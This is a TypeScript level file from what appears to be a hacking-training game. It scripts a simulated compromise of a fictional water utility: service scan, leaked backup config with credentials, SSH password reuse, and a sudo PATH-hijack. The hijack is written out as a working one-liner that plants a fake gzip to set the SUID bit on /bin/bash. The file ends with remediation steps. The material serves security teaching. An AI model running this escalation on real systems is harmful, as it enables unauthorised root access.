import type { ChainDef } from "../../types";
import { match, strictCmd } from "../../engine";

const IP = "192.0.2.120";

export const ghostLevel12: ChainDef = {
  id: "ghost-12",
  difficulty: "ghost",
  order: 12,
  points: 400,
  title: "No Checklist",
  codename: "GHOST ASSESSMENT — NO CHECKLIST",
  summary: "One target. No objective list, no hints, no note telling you what phase you're in. Everything you need to get through this, you've already done once before, somewhere in this game — you just have to recognize it yourself this time.",
  briefing: [
    `TARGET: Fennimore Water Authority — ${IP}`,
    "There is no objective checklist for this engagement, and no hints. Compromise the target and",
    "prove it, the way an actual assessment works: you decide what phase you're in, what to try next,",
    "and when you're actually done. Every technique this box needs, you've already used somewhere",
    "earlier in this game — recognizing which one applies, in what order, without being told, is the",
    "entire test.",
  ],
  debrief: [
    "root cause: a config file with live database credentials was committed to the public-facing web",
    "root, reachable directly over HTTP (CWE-200/CWE-538). Those credentials doubled as a reused SSH",
    "password for a low-privilege account, and that account had unrestricted sudo rights over a",
    "maintenance script referenced without an absolute path — a PATH hijack away from root",
    "(CWE-426/CWE-427).",
    "",
    "None of these were novel. A leaked config file, password reuse, and a PATH-based sudo",
    "misconfiguration each showed up earlier in this game on their own. What made this one different",
    "is that nothing told you which ones applied here, or in what order — that recognition, done",
    "without a checklist, is what separates rehearsed technique from actual working methodology.",
    "",
    "FENNIMORE WATER AUTHORITY: SECURED.",
  ],
  nodes: [
    {
      id: "fennimore",
      org: "Fennimore Water Authority",
      city: "Fennimore",
      state: "NE",
      coords: { x: 50.5, y: 17.8 },
      ip: IP,
      tagline: "Regional water utility",
      hideObjectives: true,
      briefing: [`IP: ${IP}`, "No further information provided."],
      initialPrompt: "op@breachline:~$",
      motd: [],
      objectives: [
        { id: "recon", label: "Enumerate open services on the target", tactic: "Reconnaissance" },
        { id: "identify", label: "Find the exposed credential leak on the web root", tactic: "Discovery", requires: ["recon"] },
        { id: "access", label: "Reuse the leaked credentials to get a shell", tactic: "Initial Access", requires: ["identify"] },
        { id: "privesc-discover", label: "Find the sudo misconfiguration", tactic: "Discovery", requires: ["access"] },
        { id: "privesc", label: "Exploit the PATH hijack to become root", tactic: "Privilege Escalation", requires: ["privesc-discover"] },
        { id: "loot", label: "Recover proof of root access", tactic: "Collection", requires: ["privesc"] },
        { id: "secure", label: "Remediate every root cause", tactic: "Remediation", requires: ["loot"] },
      ],
      hints: [],
      debrief: [],
      commands: [
        strictCmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP],
          help: "nmap -sV <ip>",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT     STATE SERVICE VERSION",
              "22/tcp   open  ssh     OpenSSH 9.3p1",
              "80/tcp   open  http    nginx 1.24.0",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 4.10 seconds",
            ],
          }),
        }),
        strictCmd({
          id: "curl-root",
          tool: "curl",
          requires: ["http://" + IP],
          forbids: ["config", ".git", "backup"],
          help: "curl http://<ip>/",
          requiresFlags: ["scanned"],
          run: () => ({
            tone: "output",
            output: [
              "HTTP/1.1 200 OK",
              "",
              "<title>Fennimore Water Authority — Utility Portal</title>",
              '<a href="/config.php.bak">config.php.bak</a>',
            ],
          }),
        }),
        strictCmd({
          id: "curl-config",
          tool: "curl",
          requires: ["config.php.bak"],
          help: "curl http://<ip>/config.php.bak",
          requiresFlags: ["scanned"],
          run: () => ({
            completesObjective: "identify",
            tone: "success",
            setsFlags: ["have_creds"],
            note: "Fennimore Water Authority — reused credentials leaked via config.php.bak: mreyes / Riverbend_2019",
            output: [
              "HTTP/1.1 200 OK",
              "",
              "<?php",
              "  // TODO: move this before the next audit",
              "  $db_host = 'localhost';",
              "  $db_user = 'mreyes';",
              "  $db_pass = 'Riverbend_2019';",
              "?>",
              "",
              "[!] an editor left the .bak extension on a backup of the live config, and the web server",
              "    happily serves .bak files as plaintext instead of executing them.",
            ],
          }),
        }),
        strictCmd({
          id: "ssh-login",
          tool: "ssh",
          requires: ["mreyes", IP],
          help: `ssh mreyes@${IP}`,
          requiresFlags: ["have_creds"],
          deniedOutput: ["you need valid credentials for this host before ssh will get you anywhere."],
          run: () => ({
            completesObjective: "access",
            tone: "success",
            setsFlags: ["shell_access"],
            promptAfter: "mreyes@fennimore:~$",
            output: [
              "mreyes@192.0.2.120's password: ",
              "Last login: Tue Jul 22 09:14:02 2025",
              "",
              "[+] the config leak's database password was reused as this account's SSH password too.",
            ],
          }),
        }),
        strictCmd({
          id: "sudo-l",
          tool: "sudo",
          requires: ["-l"],
          help: "sudo -l",
          requiresFlags: ["shell_access"],
          run: () => ({
            completesObjective: "privesc-discover",
            tone: "success",
            setsFlags: ["saw_sudo"],
            note: "Fennimore Water Authority — mreyes may run /opt/utility/run-maintenance.sh as root, NOPASSWD",
            output: [
              "Matching Defaults entries for mreyes on fennimore:",
              "    !visiblepw, env_reset",
              "",
              "User mreyes may run the following commands on fennimore:",
              "    (root) NOPASSWD: /opt/utility/run-maintenance.sh",
              "",
              "[!] worth checking what run-maintenance.sh actually calls, and how.",
            ],
          }),
        }),
        strictCmd({
          id: "cat-script",
          tool: "cat",
          requires: ["run-maintenance.sh"],
          help: "cat /opt/utility/run-maintenance.sh",
          requiresFlags: ["saw_sudo"],
          run: () => ({
            tone: "output",
            setsFlags: ["saw_script"],
            output: [
              "#!/bin/bash",
              "echo \"running nightly maintenance...\"",
              "systemctl status utility-sensors",
              "gzip -k /var/log/utility-sensors.log",
              "",
              "[!] `gzip` and `systemctl` are both called by bare name, not by absolute path — whatever",
              "    binary named `gzip` comes first in $PATH is what actually runs, and mreyes controls",
              "    their own $PATH.",
            ],
          }),
        }),
        {
          id: "privesc",
          tool: "sudo",
          match: (input) => {
            const n = input.trim().toLowerCase();
            return (
              n.includes("gzip") &&
              (n.includes("chmod +s") || n.includes("chmod 4755") || n.includes("/bin/bash")) &&
              n.includes("path=") &&
              n.includes("run-maintenance.sh")
            );
          },
          help: 'echo -e \'#!/bin/bash\\nchmod +s /bin/bash\' > /tmp/gzip && chmod +x /tmp/gzip && sudo PATH=/tmp:$PATH /opt/utility/run-maintenance.sh',
          requiresFlags: ["saw_script"],
          deniedOutput: ["find the script's actual bare-name call before trying to hijack it — read it first."],
          run: () => ({
            completesObjective: "privesc",
            tone: "success",
            setsFlags: ["root_access"],
            promptAfter: "root@fennimore:~$",
            output: [
              "running nightly maintenance...",
              "",
              "[+] the script ran as root and called your planted 'gzip' from the front of $PATH instead",
              "    of the real one — that fake gzip set the SUID bit on /bin/bash",
              "[+] /bin/bash -p now gives you a root shell on demand",
            ],
          }),
        },
        strictCmd({
          id: "cat-flag",
          tool: "cat",
          requires: ["root.txt"],
          help: "cat /root/root.txt",
          requiresFlags: ["root_access"],
          run: () => ({
            completesObjective: "loot",
            tone: "success",
            note: "Fennimore Water Authority — root.txt: c9f0f895fb98ab9159f51fd0297e236d",
            output: ["c9f0f895fb98ab9159f51fd0297e236d"],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system",
          requiresObjectives: ["loot"],
          deniedOutput: ["confirm root access before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] removed config.php.bak and every other stray backup file from the web root, and blocked",
              "    the web server from ever serving .bak/.old/.orig extensions again",
              "[+] rotated the database credentials and this account's SSH password separately, so a leak",
              "    of one never again compromises the other",
              "[+] rewrote run-maintenance.sh to call every binary by absolute path",
              "",
              "FENNIMORE WATER AUTHORITY: SECURED",
            ],
          }),
        },
      ],
    },
  ],
};
